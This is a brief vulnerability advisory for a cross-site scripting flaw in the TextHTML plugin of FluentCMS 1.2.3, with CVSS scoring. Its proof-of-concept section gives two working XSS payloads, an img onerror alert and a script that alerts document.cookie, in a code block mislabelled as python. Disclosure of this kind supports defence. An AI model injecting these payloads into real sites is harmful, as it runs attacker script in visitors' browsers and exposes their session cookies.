FluentCMS 1.2.3 is vulnerable to Cross Site Scripting (XSS) in TextHTML plugin.
CVSS Details
CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Configurations (Affected Products)
No configuration data available.
FluentCMS 1.2.3
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-38947 -->
<!-- Inject this payload into the TextHTML plugin input field -->
<img src=x onerror=alert('CVE-2026-38947_Exploited')>
<!-- Alternatively, a script tag -->
<script>
console.log('XSS Triggered');
alert(document.cookie);
</script>